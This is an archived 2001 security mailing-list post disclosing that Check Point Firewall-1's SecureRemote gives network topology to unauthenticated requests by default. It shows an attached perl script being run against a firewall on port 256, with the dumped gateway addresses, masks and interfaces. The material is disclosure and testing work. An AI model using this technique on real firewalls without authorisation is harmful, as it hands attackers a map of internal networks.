Hi.
Checkpoint Firewall-1 makes use of a piece of software called SecureRemote
to create encrypted sessions between users and FW-1 modules. Before remote
users are able to communicate with internal hosts, a network topology of
the protected network is downloaded to the client. While newer versions of
the FW-1 software have the ability to restrict these downloads to only
authenticated sessions, the default setting allows unauthenticated
requests to be honoured. This gives a potential attacker a wealth of
information including ip addresses, network masks (and even friendly
descriptions)
The attached file will connect to the firewall, and download the
toplogy (if SecureRemote is running)
(it is a tiny perl file, which needs only Socket, so avoids the hassle of
having to install the SecureRemote client <or booting windows> to test a
firewall-1)
--snip--
SensePost# perl sr.pl firewall.victim.com
Testing on port 256
:val (
:reply (
: (-SensePost-dotcom-.hal9000-19.3.167.186
:type (gateway)
:is_fwz (true)
:is_isakmp (true)
:certificates ()
:uencapport (2746)
:fwver (4.1)
:ipaddr (19.3.167.186)
:ipmask (255.255.255.255)
:resolve_multiple_interfaces ()
:ifaddrs (
: (16.3.167.186)
: (12.20.240.1)
: (16.3.170.1)
: (29.203.37.97)
)
:firewall (installed)
:location (external)
:keyloc (remote)
:userc_crypt_ver (1)
:keymanager (
:type (refobj)
:refname ("#_-SensePost-dotcom-")
) :name
(-SensePost-dotcom-Neo16.3.167.189)
:type (gateway)
:ipaddr (172.29.0.1)
:ipmask (255.255.255.255)
)
--snip--
Haroon Meer
+27 837866637
haroonat_private
http://www.sensepost.com
This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 20:05:10 PDT